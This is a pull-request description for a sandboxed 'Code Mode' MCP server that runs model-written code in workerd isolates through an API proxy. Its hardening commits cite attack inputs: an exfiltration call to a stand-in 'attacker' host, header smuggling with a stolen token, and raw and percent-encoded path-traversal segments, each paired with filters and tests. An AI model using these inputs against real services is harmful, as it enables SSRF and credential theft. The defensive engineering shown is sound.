feat(mcp)!: v2.0.0 — Code Mode (workerd sidecar, 10-tool surface) #11
Draft
pratikbin wants to merge 11 commits into
Stand up the workerd sidecar that backs Code Mode v2:
- workerd config (Cap'n Proto): dispatcher worker on :8787, api-proxy worker with private-network globalOutbound, workerLoader binding for the Dynamic Worker Loader (experimental flag required).
- spec bootstrap: on the first request the dispatcher fetches /api-docs/openapi.yaml via api-proxy bootstrap mode, resolves $refs, strips description/example fields, and caches the result in module scope.
- /run search mode: each call gets a fresh V8 isolate via the worker loader. The isolate imports a generated `host.js` exposing `spec`, `console`, `sleep` (no network and no api in this phase). 5s timeout, 1MB code cap, structured error envelope.
- spec-loader is bundled with `bun build` so workerd can embed its yaml dependency inline (workerd cannot resolve node_modules).
- Go client + Search MCP tool registered alongside the existing 94 tools. A HealthMonitor goroutine probes /health; main wires /readyz to expose workerd readiness.
- bun unit tests for dispatcher + spec-loader; Go unit tests for client + handler; an integration test forks a real workerd against an httptest backend serving a fixture spec.
Backend (autogen-backend-v2) operationId gate landed in feat/openapi-operationids; it is required for Phase 2 SDK codegen.
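The spec bootstrap strips description/example fields before caching. A minimal sketch of such a strip, assuming a hypothetical `stripDocs` helper that runs over an already $ref-resolved spec. It also guards schema `properties` maps, where a key named `description` is a field name rather than documentation, a case a naive key-based strip would silently break.

```typescript
// Hypothetical helper (name and shape are assumptions): drop documentation-only
// `description` and `example` keys from an already $ref-resolved OpenAPI object.
type Json = null | boolean | number | string | Json[] | { [key: string]: Json };

const DOC_KEYS = new Set(["description", "example"]);

function stripDocs(node: Json, inPropertiesMap = false): Json {
  if (Array.isArray(node)) {
    return node.map((item) => stripDocs(item));
  }
  if (node !== null && typeof node === "object") {
    const out: { [key: string]: Json } = {};
    for (const [key, value] of Object.entries(node)) {
      // Keys of a schema's `properties` map are field names, so a field that
      // happens to be called "description" must survive.
      if (!inPropertiesMap && DOC_KEYS.has(key)) continue;
      // Only the direct children of a `properties` keyword are field names.
      out[key] = stripDocs(value, key === "properties" && !inPropertiesMap);
    }
    return out;
  }
  return node; // strings, numbers, booleans and null pass through unchanged
}
```

Dropping response `description` makes the cached document technically invalid OpenAPI, which is acceptable for a search-only copy.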
- api-proxy: authenticated mode forwards X-Api-Key/Bearer, builds query strings, applies a 12s upstream timeout, and returns structured network/timeout envelopes.
- api-sdk-builder: emits an ESM module per call from the in-memory spec. Generates `api.<group>.<operationId>(args)` keyed by tag, with an `api.raw(method, path, opts)` escape hatch. Throws ApiError on 4xx/5xx carrying status + body + path.
- host.js: drops the `api` export; `wrapMainModule` now declares a run(callback) entrypoint that builds api inside the run scope so the RPC stub stays alive (avoids the "RPC stub used after being disposed" disposal race).
- dispatcher: passes the api callback to entry.run() instead of a separate setApi() RPC.
- Go: AuthCtx context plumbing (WithAuthHeaders / AuthFromContext), Execute MCP tool with auth forwarding, registered in server.go.
- Tests: bun (api-proxy / host / sdk-builder), Go unit (auth + execute forwards auth), integration (execute happy path + auth error).
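The SDK shape described above (typed accessors grouped by tag, an `api.raw` escape hatch, ApiError on 4xx/5xx) can be sketched as follows. This is an illustration, not the shipped api-sdk-builder.js: the `Transport` signature, the use of the first tag as group, the `"default"` group name and the `{param}` substitution from args are all assumptions.

```typescript
// Hypothetical sketch: spec shape, Transport signature and the args
// convention are assumptions, not the shipped api-sdk-builder.js.
type Operation = { operationId?: string; tags?: string[] };
type Spec = { paths: Record<string, Record<string, Operation>> };
type Transport = (
  method: string,
  path: string,
  opts?: unknown,
) => Promise<{ status: number; body: unknown }>;

class ApiError extends Error {
  status: number;
  body: unknown;
  path: string;
  constructor(status: number, body: unknown, path: string) {
    super(`API error ${status} on ${path}`);
    this.name = "ApiError";
    this.status = status;
    this.body = body;
    this.path = path;
  }
}

const HTTP_METHODS = new Set(["get", "put", "post", "delete", "patch", "head", "options"]);

// Substitutes {param} placeholders from args, e.g. /projects/{id}.
function fillPath(template: string, args: Record<string, unknown>): string {
  return template.replace(/\{(\w+)\}/g, (_match: string, name: string) => {
    if (args[name] === undefined) throw new Error(`missing path param: ${name}`);
    return encodeURIComponent(String(args[name]));
  });
}

function buildSdk(spec: Spec, transport: Transport) {
  // Every typed call funnels through here; 4xx/5xx become ApiError.
  const raw = async (method: string, path: string, opts?: unknown) => {
    const res = await transport(method, path, opts);
    if (res.status >= 400) throw new ApiError(res.status, res.body, path);
    return res.body;
  };

  const api: Record<string, any> = { raw };
  for (const [path, item] of Object.entries(spec.paths)) {
    for (const [method, op] of Object.entries(item)) {
      // Operations without an operationId stay reachable only via api.raw.
      if (!HTTP_METHODS.has(method) || !op.operationId) continue;
      const group = op.tags?.[0] ?? "default";
      api[group] ??= {};
      api[group][op.operationId] = async (args: Record<string, unknown> = {}) =>
        raw(method.toUpperCase(), fillPath(path, args), args);
    }
  }
  return api;
}
```

Making the typed accessors `async` means a missing path parameter surfaces as a rejected promise, the same way an ApiError does, so user code needs only one error-handling path.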
Long-running execute calls auto-upgrade to a job after the 90s sync
window; the model loops pollJob(jobId) until the job completes or hits
the 600s wall cap.
- dispatcher: jobStore (Map keyed by `j_${uuid}`) tracks each execute
isolate. Each /run execute registers a job and races the run against the
90s sync window; if the run finishes inside 90s the response is the
terminal envelope, otherwise it returns {status: 'running', jobId}.
/poll blocks for up to another 90s using awaitJobUntil() against the
job's waiter set.
- Wall cap: startIsolateRun races against a 600s timer; on expiry the
job is finalised with errorKind: 'timeout'.
- TTL: terminal jobs are evicted 30 min after finishedAt.
- Result cap: 64 KB serialised; oversized payloads return {__truncated,
preview}.
- /health now reports jobsRunning + jobStoreSize.
- Go: Client.Poll + PollJob MCP tool registered in server.go.
- Tests: Go unit (poll happy + jobMissing, handler missing arg).
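The 64 KB result cap above can be sketched as a single check on the serialised result. This is a minimal sketch, assuming a hypothetical `capResult` helper and an assumed 2048-character preview; only the 64 KB limit and the `{__truncated, preview}` shape come from the commit.

```typescript
// Hypothetical sketch of the 64 KB result cap. The preview length is an
// assumption; only the cap and the {__truncated, preview} shape are documented.
const RESULT_CAP_BYTES = 64 * 1024;
const PREVIEW_CHARS = 2048; // assumed preview size

function capResult(value: unknown, capBytes: number = RESULT_CAP_BYTES): unknown {
  const serialised = JSON.stringify(value) ?? "null"; // undefined serialises to nothing
  // Measure UTF-8 bytes, not UTF-16 code units, so non-ASCII text is counted fairly.
  const bytes = new TextEncoder().encode(serialised).length;
  if (bytes <= capBytes) return value;
  return { __truncated: true, preview: serialised.slice(0, PREVIEW_CHARS) };
}
```

`JSON.stringify` still throws on cyclic values and BigInt, so a real implementation would need to classify that case separately.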
BREAKING CHANGE: 87 native MCP tools removed. The long-tail API surface is now reachable via search/execute/pollJob (Code Mode v2).
Native tools retained (7): GetQuotas, GetSupportedProjectTypes, CheckProjectUniqueName, CreateProject, UploadDeploymentBase64Files, GetDeployment, CancelDeployment.
Code Mode tools (3): search(code), execute(code), pollJob(jobId).
Phase 4 changes:
- server.go: trimmed to 7 native + 3 code-mode AddTool calls. Version bumped to 2.0.0.
- mcptools/, handlers/: 87 long-tail files deleted from each (174 total).
- token-budget gate: scripts/count-tokens.ts asserts the 10-tool descriptor surface stays under 1500 tokens (currently 476).
- Prometheus metrics: codemode_run_duration_seconds (per mode/outcome), codemode_jobs_running, codemode_jobstore_size, codemode_api_call_duration_seconds. Exposed at /metrics in HTTP mode.
- HealthMonitor pulls jobsRunning + jobStoreSize from workerd /health and exports them as gauges.
- Hardened Dockerfile (distroless/nonroot) + workerd Dockerfile (non-root debian) + k8s/pod-v2.yaml (read-only rootfs, dropped caps, RuntimeDefault seccomp, mcp /readyz + workerd /health probes).
- Smoke + soak scripts for staging verification.
- docs/runbook-v2.md: ops runbook (health, common failures, rollback, capacity).
- README: 85+ → 10 tools; new Code Mode section with example.
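A token-budget gate of this kind reduces to "serialise every descriptor, count, compare". The commit does not say which tokenizer scripts/count-tokens.ts uses, so this sketch substitutes a crude ~4-characters-per-token estimate; the `ToolDescriptor` shape and helper names are hypothetical.

```typescript
// Hypothetical budget check: the real scripts/count-tokens.ts tokenizer is not
// described, so a rough ~4-characters-per-token estimate stands in for it.
type ToolDescriptor = { name: string; description: string; inputSchema: unknown };

const TOKEN_BUDGET = 1500;

function estimateTokens(text: string): number {
  return Math.ceil(text.length / 4); // heuristic only, not a real tokenizer
}

function checkBudget(tools: ToolDescriptor[], budget: number = TOKEN_BUDGET) {
  // Count the serialised descriptor, since that is what tools/list sends.
  const total = tools.reduce((sum, tool) => sum + estimateTokens(JSON.stringify(tool)), 0);
  return { total, ok: total <= budget };
}
```

In CI the script would exit non-zero when `ok` is false, so the token-budget workflow fails before a descriptor change bloats every client's context.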
api-proxy:
- buildUrl rejects non-relative paths (must start with single '/'),
blocking SSRF / credential exfil via api.raw("GET","https://attacker").
- sanitizeRequestHeaders allowlists user-supplied headers; auth headers
spread last so X-Api-Key/Authorization cannot be overridden by user
code or smuggled by ApiCall.
- sanitizeResponseHeaders allowlists relayed response headers; strips
Set-Cookie and any internal x-* headers before they reach the sandbox.
- await req.json() now wrapped in try/catch — malformed bodies return
400, not 500.
dispatcher:
- Wall-timeout (600s) attempts best-effort dispose of the runaway
worker's RPC entrypoint + worker stub. Comment documents the workerd
limitation: there is no isolate.terminate() yet, so the V8 isolate
continues until the Worker Loader's LRU evicts it. Disposing the stub
ensures any further api-proxy calls from the runaway code surface as
ProxyError instead of being silently delivered.
integration_test:
- startWorkerd cancel() now Wait()s after Kill() and sleeps 100ms so the
fixed loopback port + pid table are released before the next test.
bun tests added: SSRF block, protocol-relative `//` path block, header
override, response header strip, malformed body. 18/18 pass.
Review item 4 (waiter cleanup deletes `wake`, not `resolve`) was verified
as already correct in the shipped dispatcher.js:189; only the plan file
had the bug, and the implementation was written correctly.
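The response-header allowlist described above can be sketched as follows. The allowlist contents are hypothetical (the commit does not list them); the point is that anything not explicitly allowed, including `Set-Cookie` and internal `x-*` headers, never reaches the sandbox.

```typescript
// Hypothetical allowlist; the shipped contents are not listed in the commit.
const SAFE_RESPONSE_HEADERS = new Set([
  "content-type",
  "content-length",
  "etag",
  "last-modified",
  "retry-after",
]);

function sanitizeResponseHeaders(headers: Headers): Record<string, string> {
  const out: Record<string, string> = {};
  headers.forEach((value, name) => {
    // Headers yields lowercase names; anything not allowlisted (Set-Cookie,
    // internal x-* headers, ...) is dropped before user code sees it.
    if (SAFE_RESPONSE_HEADERS.has(name)) out[name] = value;
  });
  return out;
}
```

An allowlist rather than a denylist means a new internal header added upstream later is hidden by default.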
Critical:
- Auth was never reaching workerd. Execute() called AuthFromContext but
no middleware populated the ctx. Added AuthFromRequest that reads
mcp.CallToolRequest.Header (matching the native handlers/request.go
pattern) and falls back to AuthFromContext. Added a thin HTTP
middleware (codemodeAuthHeadersMiddleware) that mirrors incoming
X-Api-Key / Authorization into ctx via WithAuthHeaders so AuthFromContext
works as a backup path even on transports that don't surface request
headers on the MCP request struct.
- startIsolateRun now disposes the entry+worker stubs in a finally
block on EVERY call (success, user error, timeout) — not just wall
timeout. Search timeout now also flows through startIsolateRun's
timer instead of an outer Promise.race that left the isolate alive
and undisposed. Prevents CPU-bound user code from accumulating
cached workers.
Warnings:
- Bearer header now forwarded as X-Access-Token to match native client
(helpers/httpclient.go uses X-Access-Token; sending Authorization
Bearer would silently fail on Bearer-authenticated callers).
X-Access-Token added to SAFE_REQUEST_HEADERS allowlist.
- buildUrl now preserves any path prefix on BACKEND_URL. Previously a
BACKEND_URL like "https://host/api" would be stripped to
"https://host/v1/..." for authenticated calls (bootstrap concatenated
raw, masking the bug). Bootstrap path now also routes through
buildUrl so both modes behave the same.
- Pod manifest mounts a ConfigMap at /etc/createos and sets
CREATEOS_MCP_CONFIG so the binary's --config flag honours it. main.go
flag default now reads CREATEOS_MCP_CONFIG. Pod will no longer crash
on startup with "config.yaml not found".
Info:
- host.js wrapMainModule moves `userFn = (${userCode})` inside the
try/catch so syntax errors surface as user-code errors, not infra.
- soak.ts pre-claims work units so TOTAL is never overshot, wraps fetch
in try/catch, and reports succeeded/failed/errored separately.
Tests: 20/20 bun (added X-Access-Token, base-path preservation,
bootstrap prefix), Go auth_test (added AuthFromRequest cases:
X-Api-Key header, Bearer header, ctx fallback), 3/3 integration still
pass.
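The Bearer forwarding fix above amounts to choosing the outgoing credential header from the trusted auth context. A minimal sketch, assuming a hypothetical `AuthCtx` shape and assuming the API key wins when both credentials are present (the commit does not say).

```typescript
// Hypothetical AuthCtx shape. Preferring the API key when both are present
// is an assumption of this sketch.
type AuthCtx = { apiKey?: string; bearer?: string };

function buildAuthHeaders(auth: AuthCtx): Record<string, string> {
  if (auth.apiKey) return { "X-Api-Key": auth.apiKey };
  // Bearer tokens go out as X-Access-Token, as the native Go client does;
  // an "Authorization: Bearer ..." header would not be honoured upstream.
  if (auth.bearer) return { "X-Access-Token": auth.bearer };
  return {};
}
```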
Critical:
- authMiddleware: any Authorization header containing a space (e.g.
"Basic abc") used to satisfy the gate because the missing-credentials
branch only checked for empty Authorization. Now we parse the header,
require scheme = "Bearer" + non-empty token, reject everything else
with 401.
- api-proxy: removed x-access-token from SAFE_REQUEST_HEADERS allowlist.
It was added when X-Access-Token replaced Authorization for bearer
forwarding, but allowlisting it lets user code inject
headers: {"X-Access-Token": "stolen"} for callers that authenticated
via API key (where buildAuthHeaders never sets X-Access-Token, so the
injected value survives). All credential headers are now populated
exclusively from the trusted authCtx.
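Both Critical fixes above can be sketched together. The shipped authMiddleware is Go; it is shown here in TypeScript only to keep one language across these examples. The allowlist contents and helper names are hypothetical. The header merge writes trusted credentials last, so a user-supplied `X-Access-Token` is dropped by the allowlist and can never survive for an API-key caller.

```typescript
// Hypothetical allowlist: the shipped SAFE_REQUEST_HEADERS contents are not
// listed in the commit. Credential headers are deliberately absent.
const SAFE_REQUEST_HEADERS = new Set(["accept", "content-type", "if-none-match"]);

// Strict Bearer parsing: "Basic abc", "Bearer" and "Bearer " all yield null.
function parseBearer(header: string | null): string | null {
  if (!header) return null;
  const space = header.indexOf(" ");
  if (space < 0) return null;
  const scheme = header.slice(0, space);
  const token = header.slice(space + 1).trim();
  // Auth scheme names are case-insensitive per RFC 9110.
  if (scheme.toLowerCase() !== "bearer" || token === "") return null;
  return token;
}

function sanitizeRequestHeaders(
  userHeaders: Record<string, string>,
  authHeaders: Record<string, string>,
): Record<string, string> {
  const out: Record<string, string> = {};
  for (const [name, value] of Object.entries(userHeaders)) {
    const lower = name.toLowerCase();
    if (SAFE_REQUEST_HEADERS.has(lower)) out[lower] = value;
  }
  // Trusted credentials are written last, so nothing user code supplied can
  // override them, and absent credentials cannot be smuggled in either.
  for (const [name, value] of Object.entries(authHeaders)) out[name.toLowerCase()] = value;
  return out;
}
```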
Warnings:
- jobStore + isolate concurrency caps. New constants:
MAX_RUNNING_JOBS = 50 (concurrent execute jobs)
MAX_JOB_STORE_TOTAL = 500 (running + finished-but-not-yet-evicted)
MAX_RUNNING_SEARCHES = 50 (concurrent search isolates)
/run returns 429 with errorKind: "capacity" when a limit is hit.
Bounds memory growth and isolate accumulation when CPU-bound user
code runs to wall_timeout (workerd cannot synchronously terminate the
V8 isolate; LRU eviction lags).
- Search path now decrements its in-flight counter in a finally block.
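The caps above amount to a check in front of each /run plus a counter released in `finally`. A minimal sketch, assuming a hypothetical `Counters` shape and a JSON 429 body carrying only `errorKind`; the constant values are the ones listed in this commit.

```typescript
// Caps as listed in the commit; the Counters shape is hypothetical.
const MAX_RUNNING_JOBS = 50;
const MAX_JOB_STORE_TOTAL = 500;
const MAX_RUNNING_SEARCHES = 50;

type Counters = { runningJobs: number; jobStoreSize: number; runningSearches: number };

// Returns a 429 response when the requested mode is at capacity, else null.
function capacityError(mode: "search" | "execute", c: Counters): Response | null {
  const full =
    mode === "search"
      ? c.runningSearches >= MAX_RUNNING_SEARCHES
      : c.runningJobs >= MAX_RUNNING_JOBS || c.jobStoreSize >= MAX_JOB_STORE_TOTAL;
  if (!full) return null;
  return new Response(JSON.stringify({ errorKind: "capacity" }), {
    status: 429,
    headers: { "content-type": "application/json" },
  });
}

// Wraps a search run so the in-flight counter is released on every path.
async function runSearchGuarded<T>(c: Counters, run: () => Promise<T>): Promise<T | Response> {
  const rejected = capacityError("search", c);
  if (rejected) return rejected;
  c.runningSearches++;
  try {
    return await run();
  } finally {
    c.runningSearches--; // success, user error and timeout alike
  }
}
```

Decrementing in `finally` is what keeps a throwing or timed-out search from permanently consuming one of the 50 slots.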
Tests:
- bun: added credential-smuggling test (X-Access-Token, Authorization,
X-Api-Key, Cookie all stripped from user-supplied headers); 21/21
pass.
- go: existing tests still pass; integration 3/3 pass.
Critical:
- buildUrl rejects "." and ".." path segments. URL normalisation collapses "/api/../admin" to "/admin", which would let user code escape any BACKEND_URL path prefix and reach unrelated routes (e.g. /admin from a /api-prefixed deployment).
Warnings:
- jobStore total cap (500) now evicts the oldest finished job (earliest finishedAt) before falling back to 429. Previously a burst of 500 fast successful executes would 429 every subsequent request for the next 30 minutes, even with zero running jobs.
- api-proxy now reads the response body once via resp.text() and parses JSON in-process. resp.json() consumes the body, so the previous resp.text() fallback would throw "body already used" whenever the JSON parse failed.
- stdio transport now reads the CREATEOS_API_KEY / CREATEOS_BEARER env vars when neither request headers nor ctx headers are present. AuthFromEnv is exposed for tests; AuthFromRequest cascades: request header → ctx → env.
Info:
- The host.js wrapMainModule comment was misleading: a syntax error in userCode fails the dynamic ESM module compile BEFORE run() executes, so the inner try cannot catch it. The comment now describes the real flow, and dispatcher.js startIsolateRun catches SyntaxError from the loader/run promise chain and reclassifies it as kind=SyntaxError / userCode, so the model sees actionable feedback instead of errorKind=infra.
Tests:
- bun: dot-segment escape (/../admin), middle dot-segment (/v1/foo/../../admin), invalid JSON with a JSON content-type. 24/24 pass.
- go: TestAuthFromRequest_FallsBackToEnv, TestAuthFromEnv_None.
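The job-store eviction policy (30 min TTL on terminal jobs, then evict the oldest finished job before answering 429) can be sketched as below. The `Job` shape and helper names are hypothetical; only `finishedAt`, the TTL and the 500-entry cap come from the commits.

```typescript
// Hypothetical Job shape; only `finishedAt`, the 30 min TTL and the
// 500-entry cap come from the commit text.
type Job = { id: string; status: "running" | "done" | "error"; finishedAt?: number };

const JOB_TTL_MS = 30 * 60 * 1000;
const MAX_JOB_STORE_TOTAL = 500;

// Drops terminal jobs whose TTL has elapsed (deleting during Map iteration is safe).
function evictExpired(store: Map<string, Job>, now: number): void {
  for (const [id, job] of store) {
    if (job.finishedAt !== undefined && now - job.finishedAt >= JOB_TTL_MS) store.delete(id);
  }
}

// Makes room for one more job. Returns false (caller answers 429) only when
// the store is full and holds no finished job that could be evicted.
function reserveSlot(store: Map<string, Job>, now: number, cap: number = MAX_JOB_STORE_TOTAL): boolean {
  evictExpired(store, now);
  if (store.size < cap) return true;
  let oldestId: string | undefined;
  let oldestAt = Infinity;
  for (const [id, job] of store) {
    if (job.finishedAt !== undefined && job.finishedAt < oldestAt) {
      oldestAt = job.finishedAt;
      oldestId = id;
    }
  }
  if (oldestId === undefined) return false;
  store.delete(oldestId);
  return true;
}
```

With MAX_RUNNING_JOBS at 50 and the store cap at 500, a full store always contains at least 450 finished jobs, so in practice the 429 path is reached through the running-jobs cap rather than here.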
Path traversal via percent-encoded dot-segments still bypassed the BACKEND_URL prefix check. "%2e" is equivalent to "." (RFC 3986 §2.3; the WHATWG URL Standard likewise treats "%2e" path segments as dot-segments), so URL normalisation collapsed "/api/%2e%2e/admin" to "/admin" before any request-time check ran.
buildUrl now decodeURIComponent()s each path segment before checking for "." / ".." and rejects invalid percent-encoding outright.
Tests added: %2e%2e, %2E%2e (mixed case), %2e. (partial), %ZZ (invalid encoding). 28/28 bun pass.
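Taken together, the buildUrl rules from these commits (server-relative paths only, no raw or percent-encoded dot-segments, invalid encoding rejected, BACKEND_URL prefix preserved) can be sketched as one function. The signature and error messages are assumptions. The backslash and control-character rejections are extras added in this sketch: the WHATWG URL parser treats "\" as a separator in http(s) URLs and silently drops tabs/newlines, both of which could otherwise reassemble a ".." segment.

```typescript
// Hypothetical sketch of the buildUrl path rules; signature and messages are
// assumptions. The backslash and control-character rejections are extras.
function buildUrl(backendUrl: string, path: string, query: Record<string, string> = {}): string {
  // Server-relative only: "/v1/x" passes; "https://evil" and "//evil/x" do not.
  if (!path.startsWith("/") || path.startsWith("//")) {
    throw new Error(`path must be server-relative: ${path}`);
  }
  // The URL parser drops tabs/newlines and trims trailing spaces, which
  // could turn ".\t." or ".. " into "..", so reject them up front.
  if (/[\u0000-\u0020\u007f]/.test(path)) {
    throw new Error("control characters and spaces are not allowed in path");
  }
  // Only the path part is checked; stop at the query or fragment.
  const cut = path.search(/[?#]/);
  const pathOnly = cut === -1 ? path : path.slice(0, cut);
  // For http(s) URLs the parser also treats "\" as a segment separator.
  for (const rawSegment of pathOnly.split(/[\/\\]/)) {
    let segment: string;
    try {
      segment = decodeURIComponent(rawSegment); // "%2e%2e" -> ".."
    } catch {
      throw new Error(`invalid percent-encoding in path: ${rawSegment}`);
    }
    if (segment === "." || segment === "..") {
      throw new Error(`dot-segment not allowed in path: ${path}`);
    }
  }
  const base = new URL(backendUrl);
  // Append to the base path instead of resolving against it, so a
  // BACKEND_URL such as https://host/api keeps its /api prefix.
  const prefix = base.pathname.replace(/\/+$/, "");
  const url = new URL(base.origin + prefix + path);
  for (const [key, value] of Object.entries(query)) url.searchParams.append(key, value);
  return url.toString();
}
```

Concatenating onto `base.origin + prefix` rather than calling `new URL(path, base)` is what preserves the prefix: resolving an absolute-path reference against a base replaces the base path entirely.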
Make Code Mode self-describing so clients/agents discover the pattern
on connect without external docs.
(d) Server name bumped to "CreateOS MCP (Code Mode v2)" — visible in
initialize.serverInfo.name.
(a) Richer tool descriptions for search / execute / pollJob: api shape
(api.<group>.<operationId>, api.raw escape hatch), ApiError
contract (status/body/path), result envelope (sync/async/error),
explicit limits, inline examples.
(e) tools[].Meta = {mode:"code", sandbox:"workerd", version:"v2"} on
each Code Mode tool. Lets orchestrators flag Code Mode tools
programmatically.
(b) Resources (pull-on-demand, zero cost until requested):
code-mode://intro — workflow + auth + sandbox + limits
code-mode://api-shape — api proxy + ApiError contract +
operationId discovery snippet
(c) Prompts:
code-mode/deploy-example — single execute() that deploys + waits,
with pollJob fallback
code-mode/api-discovery — 4 search() snippets that walk you
from keyword to operationId
Token surface: 476 -> 896 tokens, well under the 1500 gate.
count-tokens.ts updated to match shipped descriptions.
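The keyword-to-operationId walk that the code-mode/api-discovery prompt describes can be sketched as a plain function over an OpenAPI `paths` object. This is a hypothetical helper, not one of the shipped prompt snippets; inside an actual search() call the same loop would be the body of the submitted function, with `spec` supplied by host.js. Matching on `summary` assumes the cached spec keeps that field.

```typescript
// Hypothetical discovery helper; not one of the shipped prompt snippets.
type Op = { operationId?: string; tags?: string[]; summary?: string };
type OpenApi = { paths: Record<string, Record<string, Op>> };

const METHODS = new Set(["get", "put", "post", "delete", "patch", "head", "options"]);

function findOperations(spec: OpenApi, keyword: string) {
  const needle = keyword.toLowerCase();
  const hits: { method: string; path: string; operationId?: string; group?: string }[] = [];
  for (const [path, item] of Object.entries(spec.paths)) {
    for (const [method, op] of Object.entries(item)) {
      if (!METHODS.has(method)) continue; // skip path-level keys such as `parameters`
      const haystack = [path, op.operationId ?? "", ...(op.tags ?? []), op.summary ?? ""]
        .join(" ")
        .toLowerCase();
      if (haystack.includes(needle)) {
        // `group` is the first tag, i.e. the `api.<group>` accessor name.
        hits.push({ method: method.toUpperCase(), path, operationId: op.operationId, group: op.tags?.[0] });
      }
    }
  }
  return hits;
}
```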
The v2 ops runbook lives in internal docs only; it is not appropriate for the public createos-mcp repo. The README v2 section and this PR body cover the user-facing surface.
Summary
CreateOS MCP v2.0.0. Collapses 87 long-tail tool definitions into 3 code-mode tools backed by a
`workerd` V8 sandbox sidecar, while keeping 7 native fast-path tools for hot operations.
Tool surface (v2)
The full ~100-endpoint CreateOS API is reachable via `execute`. The model writes a single async arrow function that may chain multiple typed `api.<group>.<operationId>(args)` calls inside one sandbox boundary. Long-running ops (>90 s) auto-upgrade to a job; the model loops `pollJob` until done. Hard wall cap: 600 s.
Token cost of the 10-tool descriptor surface: 896 tokens (gated at 1500).
Architecture
Two-process pod: the Go MCP server and the `workerd` sidecar (dispatcher on :8787 plus the `api-proxy` worker).
Comms are strictly over loopback. The `api-proxy` worker is the only thing in the pod with backend egress.
Sandbox guarantees
- Each `search`/`execute` runs in a fresh V8 isolate spawned via the workerd Dynamic Worker Loader.
- User code has no network access (no `fetch`). Only the `host.js` ESM module exposes `spec`, `api`, `console`, `sleep`.
- Credentials (`X-Api-Key`, or `X-Access-Token` for bearer) are forwarded by the dispatcher to `api-proxy` from the trusted MCP request context; user code cannot inject or override them.
- `api.raw(method, path, opts)` requires server-relative paths. Absolute URLs, protocol-relative `//`, and dot-segments (raw or percent-encoded) are rejected to prevent SSRF / `BACKEND_URL` prefix escape.
- `Set-Cookie` and internal `x-*` response headers are stripped before reaching user code.
Limits
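- `search` timeout: 5 s
- `execute` sync window: 90 s
- `execute` wall cap: 600 s
- `execute` jobs: 50 running; 500 in the job store (running + finished, not yet evicted)
- `search` isolates: 50 concurrent
- Result size: 64 KB serialised (larger results return `__truncated`)
- `sleep(ms)` cap
Discovery surface (for clients)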
- `initialize.serverInfo.name` → "CreateOS MCP (Code Mode v2)"
- `tools/list` → 10 tools; the 3 code-mode tools carry `_meta = {mode:"code", sandbox:"workerd", version:"v2"}`
- `resources/list` → `code-mode://intro` (workflow + auth + sandbox + limits), `code-mode://api-shape` (typed accessor + ApiError contract + discovery snippet)
- `prompts/list` → `code-mode/deploy-example` (single execute that deploys + waits, with pollJob fallback), `code-mode/api-discovery` (4 search snippets that walk from keyword to operationId)
Cross-repo dependency
This PR depends on autogen-backend-v2#451 (private repo). That PR adds a CI gate asserting that every route in the OpenAPI spec carries an `operationId`. The MCP sidecar generates its typed SDK from those `operationId`s.
Soft dependency: operations missing an `operationId` fall through to `api.raw(...)`, so v2 works even before the backend PR merges. The hard requirement is that the typed surface be complete in production, so MCP v2 must not ship to prod until the backend PR is merged.
Backend ops tracker: NodeOps-app/autogen-backend-v2#452 (private).
Breaking changes
- 87 long-tail native tools removed; that API surface is now reachable via `search`/`execute`/`pollJob`.
- `initialize.serverInfo.name` changed from "MCP Server" to "CreateOS MCP (Code Mode v2)".
- Version bumped to `2.0.0`.
Native tools retained (7)
`GetQuotas`, `GetSupportedProjectTypes`, `CheckProjectUniqueName`, `CreateProject`, `UploadDeploymentBase64Files`, `GetDeployment`, `CancelDeployment`.
Operational
- `workerd` sidecar built from `codemode/workerd/Dockerfile` (oven/bun base, non-root user, `--experimental` workerd flag for the Dynamic Worker Loader).
- `k8s/pod-v2.yaml`: two-container pod manifest. The MCP container reads config from the `CREATEOS_MCP_CONFIG` env var (ConfigMap mounted at `/etc/createos`).
- `mcp /readyz`: 200 only when workerd `/health` responds 200.
- `mcp /metrics`: Prometheus metrics `codemode_run_duration_seconds{mode,outcome}`, `codemode_jobs_running`, `codemode_jobstore_size`, `codemode_api_call_duration_seconds`.
- `WORKERD_URL` env var (default `http://127.0.0.1:8787`) tells the MCP binary where the sidecar lives.
CI
- `.github/workflows/token-budget.yml`: `bun scripts/count-tokens.ts` asserts the 10-tool descriptor surface stays ≤1500 tokens (currently 896).
Test plan
- `go build ./...` clean
- `go test ./codemode/...` passes (15 unit tests)
- `bun test` in `codemode/workerd/` passes (28 tests across dispatcher, spec-loader, host, api-proxy, api-sdk-builder)
- `CODEMODE_INTEGRATION=1 go test -tags integration` passes (3 end-to-end tests, real workerd subprocess, mock backend)
- `bun scripts/count-tokens.ts`: 896/1500
- `k8s/pod-v2.yaml`
Files
- `codemode/`: Go package (client, handler, auth, health, metrics, discovery)
- `codemode/workerd/`: workerd config (Cap'n Proto), dispatcher.js, host.js, api-proxy.js, api-sdk-builder.js, spec-loader.js, Dockerfile, bun tests
- `server.go`: registers 7 native + 3 code-mode tools + 2 resources + 2 prompts
- `main.go`: workerd health probe, /readyz, /metrics, codemode auth-header middleware
- `Dockerfile`: distroless/static, nonroot
- `k8s/pod-v2.yaml`: pod manifest
- `scripts/{count-tokens,smoke,soak}.ts`: CI gate + load tests
- `README.md`: Code Mode section + 10-tool surface